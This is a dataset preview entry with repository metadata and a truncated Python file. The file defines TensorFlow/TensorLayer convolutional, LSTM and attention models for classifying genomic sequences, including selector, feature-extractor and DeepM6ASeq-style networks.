- hit flags (not listed = 0): num_words 1, num_chars 1, num_lines 1, cate_var_zero 1, frac_lines_import 1, score_lines_no_logic 1; frac_words_unique and frac_lines_string_concat are null
- effective `0`, hits 6
**Row 9**

- hexsha `768cb78affe687d6150c57527b7f0c0e157c9cf9`, size 50,171, ext `py`, lang Python
- max_stars: `src/model.py` in `yuanpengX/MASS` @ `1ed9116a47c94e994ba794195ba926d333f815d2`, licenses `["MIT"]`, count 5, events 2019-11-07T03:20:19.000Z to 2021-04-16T07:28:57.000Z
- max_issues: `src/model.py` in `mlcb-thu/MASS` @ `1ed9116a47c94e994ba794195ba926d333f815d2`, licenses `["MIT"]`, count null, events null to null
- max_forks: `src/model.py` in `mlcb-thu/MASS` @ `1ed9116a47c94e994ba794195ba926d333f815d2`, licenses `["MIT"]`, count 2, events 2019-11-03T06:15:51.000Z to 2020-03-19T08:49:09.000Z
- content (truncated in this preview):

```python
# encoding: utf-8
# author: xiongyuanpeng
# 2018-11-14
import tensorflow as tf
import numpy as np
from tensorlayer.layers import Conv2d, LambdaLayer, ConvLSTMLayer, BiRNNLayer, InputLayer, DenseLayer, FlattenLayer, PReluLayer
from tensorlayer.layers import * #TileLayer, ElementwiseLayer, ExpandDimsLayer, Conv1d,ConcatLayer, ElementwiseLayer,DropoutLayer,MaxPool1d
import tensorlayer as tl
from matplotlib import pyplot as plt
from config import *
import logging
from util import *
logging.basicConfig(level=logging.INFO)
KERNEL_SIZE = 5
stddev = 1
def Selector(t_sequences, reuse = False):
'''
This parts plays an role as a selector of fixed position in genes, works like attention mechanism
sequences: tf.place_holder([None, steps, embedding_dim])
'''
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope("selector", reuse=reuse) as vs:
# tl.layers.set_name_reuse(reuse) # remove for TL 1.8.0+
sequences = InputLayer(t_sequences, name='in')
# is it ok to add a embedding layer here
# use strided convolution to decrease length of sequences
return sequences,sequences
sequences = Conv1d(sequences, 32,KERNEL_SIZE , stride = 2, dilation_rate = 1, act = act, name = 'conv_500') # 500
sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = act, name = 'conv_250') # 250
sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = act, name = 'conv_125') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacking 3 bi-directiona,l lstm here
bi = BiRNNLayer(sequences, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
bi = PReluLayer(bi, channel_shared = True, name='prelu1')
#bi = BiRNNLayer(bi, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.TIME_STEPS, return_last = False, name='bi2')
#bi = PReluLayer(bi, channel_shared = True, name = 'prelu2')
#bi = BiRNNLayer(bi, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi3')
#bi = PReluLayer(bi, channel_shared = True, name='prelu3')
# use last outputs of bi-lstm to generate attention
features = FlattenLayer(bi, name='flatten_feature')
# downsample was introduced for the overfitting issue
sampled = DenseLayer(features, config.TRAIN.FC, act = act, name='downsample')
# true selecting
# 1000
selecting_logits = DenseLayer(sampled, config.TRAIN.TIME_STEPS, act = None, name='selector')
selecting = tl.layers.LambdaLayer(selecting_logits, fn = act, name='Selecting_softmax')
#print(selecting.outputs.shape)
selecting = tl.layers.ExpandDimsLayer(selecting, 2)
# broadcasting to all embeded dimension
selecting = TileLayer(selecting, [1,1,config.TRAIN.EMBED_DIM])
# by visualizing selecting vector, can detect difference between species.
return selecting, selecting_logits
def SelectorCNN(t_sequences, reuse = False):
'''
This parts plays an role as a selector of fixed position in genes, works like attention mechanism
sequences: tf.place_holder([None, steps, embedding_dim])
'''
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope("selectorCNN", reuse=reuse) as vs:
# tl.layers.set_name_reuse(reuse) # remove for TL 1.8.0+
sequences = InputLayer(t_sequences, name='in')
# is it ok to add a embedding layer here
# use strided convolution to decrease length of sequences
#
#sequences = Conv1d(sequences, 32,KERNEL_SIZE , stride = 2, dilation_rate = 1, act = act, name = 'conv_500') # 500
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = act, name = 'conv_250') # 250
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = act, name = 'conv_125') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
#features = Conv1d(selected, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = act, name = 'conv1')
features = Conv1d(sequences, 64, KERNEL_SIZE, stride = 2, act = act, name = 'conv1_stride')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 1, dilation_rate = 2, act = act, name = 'conv2')
features = Conv1d(features, 128, KERNEL_SIZE, stride = 2, act = act, name = 'conv2_stride')
features = Conv1d(features, 128, KERNEL_SIZE, stride = 1, dilation_rate = 4, act = act, name = 'conv3')
features = Conv1d(features, 256, KERNEL_SIZE, stride = 2, act = act, name = 'conv3_stride')
# stacking 3 bi-directiona,l lstm here
#bi = BiRNNLayer(sequences, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#bi = PReluLayer(bi, channel_shared = True, name='prelu1')
#bi = BiRNNLayer(bi, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.TIME_STEPS, return_last = False, name='bi2')
#bi = PReluLayer(bi, channel_shared = True, name = 'prelu2')
#bi = BiRNNLayer(bi, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi3')
#bi = PReluLayer(bi, channel_shared = True, name='prelu3')
# use last outputs of bi-lstm to generate attention
features = FlattenLayer(features, name='flatten_feature')
# downsample was introduced for the overfitting issue
sampled = DenseLayer(features, config.TRAIN.FC, act = act, name='downsample')
# true selecting
# 1000
selecting_logits = DenseLayer(sampled, config.TRAIN.TIME_STEPS, act = tf.nn.softmax, name='selector')
selecting = tl.layers.LambdaLayer(selecting_logits, fn = tf.nn.softmax, name='selector_softmax')
#print(selecting.outputs.shape)
selecting = tl.layers.ExpandDimsLayer(selecting, 2)
# broadcasting to all embeded dimension
selecting = TileLayer(selecting, [1,1,config.TRAIN.EMBED_DIM])
# by visualizing selecting vector, can detect difference between species.
return selecting, selecting_logits
def Predictor(selecting, t_sequences, reuse = False):
'''
use seleceted features to do prediction
'''
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope("predictor", reuse=tf.AUTO_REUSE) as vs:
# tl.layers.set_name_reuse(reuse) # remove for TL 1.8.0+
sequences = InputLayer(t_sequences, name='in')
def scale(x):
return 1000 * x
selected = sequences
#selecting = LambdaLayer(selecting, fn = scale, name='scale')
#selected = ElementwiseLayer([selecting, sequences], combine_fn = tf.multiply, name='selection')
# USE convolution for computing? why?
# use dialated convolution for larger reception field.
# binding codon is 3
# add depth for feature extraction
pre = Conv1d(selected, 32, act = act, name = 'conv0')
selected = pre
for i in range(config.TRAIN.STACK_DEPTH):
features = Conv1d(selected, 32, act = act, name = 'conv1_%d'%i)
features = Conv1d(features, 32, act = None, name = 'conv2_%d'%i)
selected = ElementwiseLayer([selected, features], combine_fn = tf.math.add, name = 'bypass_%d'%i)
selected = ElementwiseLayer([pre, selected], combine_fn = tf.math.add, name = 'bypass_%d'%i)
# google deepwave radio sl
# downsample pooling dialation
# no lstm, but larger reception field
features = Conv1d(selected, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = act, name = 'conv1')
features = Conv1d(selected, 64, KERNEL_SIZE, stride = 2, act = act, name = 'conv1_stride')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 1, dilation_rate = 2, act = act, name = 'conv2')
features = Conv1d(features, 128, KERNEL_SIZE, stride = 2, act = act, name = 'conv2_stride')
features = Conv1d(features, 128, KERNEL_SIZE, stride = 1, dilation_rate = 4, act = act, name = 'conv3')
features = Conv1d(features, 256, KERNEL_SIZE, stride = 2, act = act, name = 'conv3_stride')
features = FlattenLayer(features, name='flatten_features')
hidden = DenseLayer(features, config.TRAIN.FC, name='hidden')
hidden = PReluLayer(hidden, channel_shared = True, name='prelu1')
category = DenseLayer(hidden, config.TRAIN.CLASSES, act = None, name = 'predicting')
return category, tf.nn.softmax(category.outputs)
def sharedFeatureExtractor(t_sequences, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
#return sequences, sequences.outputs
#return sequences
# user larger kernel size for the first layer
feature1 = Conv1d(sequences, 300, 20, stride = 1, dilation_rate = 1, act = None, name = 'conv_500') # 500
feature1 = tl.layers.BatchNormLayer(feature1, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
feature1 = PReluLayer(feature1, channel_shared = True, name='conv1_relu')
if config.TRAIN.DROPOUT:
feature1 = DropoutLayer(feature1, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features1', is_fix = True)
feature1 = SelfAttentionLayer(feature1, 8, 32, name='attention1')
# used to simulate gapped kmer
#feature2 = Conv1d(sequences, 300, 20, stride = 1, dilation_rate = 2, act = None, name = 'conv_8_2') # 500
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
#feature2 = PReluLayer(feature2, channel_shared = True, name='conv1_2_relu')
#feature3 = Conv1d(sequences, 300, 20, stride = 1, dilation_rate = 4, act = None, name = 'conv_16_2') # 500
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
#feature3 = PReluLayer(feature3, channel_shared = True, name='conv1_3_relu')
#features = ConcatLayer([feature1, feature2, feature3], name = 'concat')
features = Conv1d(feature1, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna2')
features = PReluLayer(features, channel_shared = True, name='conv2a_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features', is_fix = True)
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_2', is_fix = True)
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_125') # 125
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True)
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacking 3 bi-directiona,l lstm here
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features, feature1.outputs
def sharedFeatureExtractor2(t_sequences, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
kernels = config.TRAIN.KERNEL.split('_')
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
#return sequences, sequences.outputs
#return sequences
# user larger kernel size for the first layer
feature_conv = Conv1d(sequences, 300, int(kernels[0]), stride = 1, dilation_rate = 1, act = None, name = 'conv_500') # 500
feature1 = tl.layers.BatchNormLayer(feature_conv, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
feature1 = PReluLayer(feature1, channel_shared = True, name='conv1_relu')
if config.TRAIN.DROPOUT:
feature1 = DropoutLayer(feature1, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features1', is_fix = True, is_train = is_train)
# used to simulate gapped kmer
feature2 = Conv1d(sequences, 300, int(kernels[1]), stride = 1, dilation_rate = 2, act = None, name = 'conv_8_2') # 500
feature2 = tl.layers.BatchNormLayer(feature2, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='feature2_bn')
feature2 = PReluLayer(feature2, channel_shared = True, name='conv1_2_relu')
if config.TRAIN.DROPOUT:
feature2 = DropoutLayer(feature2, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features2', is_fix = True, is_train = is_train)
feature3 = Conv1d(sequences, 300, int(kernels[2]), stride = 1, dilation_rate = 4, act = None, name = 'conv_16_2') # 500
feature3 = tl.layers.BatchNormLayer(feature3, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
feature3 = PReluLayer(feature3, channel_shared = True, name='conv1_3_relu')
if config.TRAIN.DROPOUT:
feature3 = DropoutLayer(feature3, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features3', is_fix = True, is_train = is_train)
features = ConcatLayer([feature1, feature2, feature3], name = 'concat')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3')
con_features = PReluLayer(features, channel_shared = True, name='conv2a_relu')
if config.TRAIN.DROPOUT:
con_features = DropoutLayer(con_features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features4', is_fix = True, is_train = is_train)
features = Conv1d(con_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250_c') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3_c')
features = PReluLayer(features, channel_shared = True, name='conv2a_relu_c')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuress1', is_fix = True, is_train = is_train)
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn4')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuresss2', is_fix = True, is_train = is_train)
features = ElementwiseLayer([features, con_features], tf.add, name = 'elem_add')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_125') # 125
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn5')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuresss3', is_fix = True, is_train = is_train)
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacking 3 bi-directiona,l lstm here
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi2')
#
features = SelfAttentionLayer(features, 8 , 128,name='self-attention')
features = SelfAttentionLayer(features, 8 , 128,name='self-attention2')
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features, feature_conv.outputs#, features.outputs
def attention(feature, name):
hidden = tl.layers.TimeDistributedLayer(feature, layer_class=tl.layers.DenseLayer, args={'n_units':64, 'name':name + 'dense','act' :tf.nn.tanh}, name= name + 'time_dense')
hidden = tl.layers.TimeDistributedLayer(hidden, layer_class=tl.layers.DenseLayer, args={'n_units':1, 'name':name + 'dense2'}, name= name + 'time_dense2')
hidden = tl.layers.FlattenLayer(hidden, name = name + 'flatten')
return LambdaLayer(hidden, fn = tf.nn.softmax, name = name + "_softmax")
def sharedFeatureExtractor2D(t_sequences, name, reuse = False, is_train=True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
#return sequences
features = Conv2d(sequences, 32,KERNEL_SIZE , stride = 2, dilation_rate = 1, act = None, name = 'conv_500') # 500
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv2d(features, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv_250') # 250
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv2d(features, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv_125') # 125
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
''''
features_ex = Conv1d(features, 32, KERNEL_SIZE, act = None, name = 'conv_same') # 125
features_ex = tl.layers.BatchNormLayer(features_ex, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn_same')
features_ex = PReluLayer(features_ex, channel_shared = True, name='convsame_relu')
# Introducing self-attention here
attention_map = AttentionLayer(features, name = 'Extractor_')
#attention_map = attention(features, 'Extractor_')
attention_map = tl.layers.ExpandDimsLayer(attention_map, 2)
attention_map = TileLayer(attention_map, [1,1,32])
features_masked = ElementwiseLayer([attention_map, features], combine_fn = tf.multiply, name='selection')
# different species will have different attention
features = tl.layers.ConcatLayer([features_ex, features_masked], -1, name ='concat_layer')
# stacking 3 bi-directiona,l lstm here
'''
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = int(config.TRAIN.RNN_HIDDEN/4), n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#self-attention mechanism
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features
def classifier(features, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
conv_features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(conv_features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
#if config.TRAIN.DROPOUT:
# features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_1', is_fix = True, is_train = is_train)
#features = ConcatLayer([features, seq_features], name = 'seq_concat')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 1, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
fin_features = PReluLayer(features, channel_shared = True, name='conv2_relu')
#if config.TRAIN.DROPOUT:
# features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_2', is_fix = True, is_train = is_train)
features = FlattenLayer(fin_features, name='flatten_features')
features = DenseLayer(features, config.TRAIN.FC, act = None, name='hidden')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
hidden = PReluLayer(features, channel_shared = True, name='prelu1')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True, is_train = is_train)
category = DenseLayer(hidden, 2, act = None, name = 'predicting')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True, is_train = is_train)
return category#, conv_features
def classifierSequences(features, t_sequences, name, reuse, is_train):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
seq_features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'seq_conv1')
seq_features = tl.layers.BatchNormLayer(seq_features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='seq_bn1')
seq_features = PReluLayer(seq_features, channel_shared = True, name='seq_conv1_relu')
seq_features1 = Conv1d(seq_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'res_seq_conv1')
#seq_features = tl.layers.BatchNormLayer(seq_features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='seq_bn1')
seq_features1 = PReluLayer(seq_features1, channel_shared = True, name='res_seq_conv1_relu')
seq_features1 = Conv1d(seq_features1, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'res_seq_conv1')
seq_features = ElementwiseLayer([seq_features, seq_features1], tf.add, name = 'elem_add')
seq_features = SelfAttentionLayer(seq_features, 8,128,name='seq_attention')
seq_features = Conv1d(seq_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = '_seq_conv1')
seq_features = tl.layers.BatchNormLayer(seq_features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='_seq_bn1')
seq_features = PReluLayer(seq_features, channel_shared = True, name='_res_seq_conv1_relu')
'''
if config.TRAIN.DROPOUT:
seq_features = DropoutLayer(seq_features, keep = config.TRAIN.DROPOUT_KEEP, name = 'seq_drop_features_1', is_fix = True, is_train = is_train)
'''
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, DROPOUT_KEEP = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_1', is_fix = True, is_train = is_train)
'''
features = ConcatLayer([features, seq_features], name = 'seq_concat')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 1, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_2', is_fix = True, is_train = is_train)
'''
features = FlattenLayer(features, name='flatten_features')
features = DenseLayer(features, config.TRAIN.FC, act = None, name='hidden')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
hidden = PReluLayer(features, channel_shared = True, name='prelu1')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True, is_train = is_train)
category = DenseLayer(hidden, 2, act = None, name = 'predicting')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featudres_3', is_fix = True, is_train = is_train)
return category
def DeepM6ASeq_pre(t_sequences, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
kernels = config.TRAIN.KERNEL.split('_')
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
return sequences, sequences.outputs
def DeepM6ASeq(features, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
features = Conv1d(features, 256, 10, stride = 1, dilation_rate = 1, act = None, name = 'conv1')
#MaxPool1d(features,)
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = 0.5, name = 'drop_features_1', is_fix = True, is_train = is_train)
features = Conv1d(features, 64, 5, stride = 1, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = 0.5, name = 'drop_features_2', is_fix = True, is_train = is_train)
fin_features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = 32, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
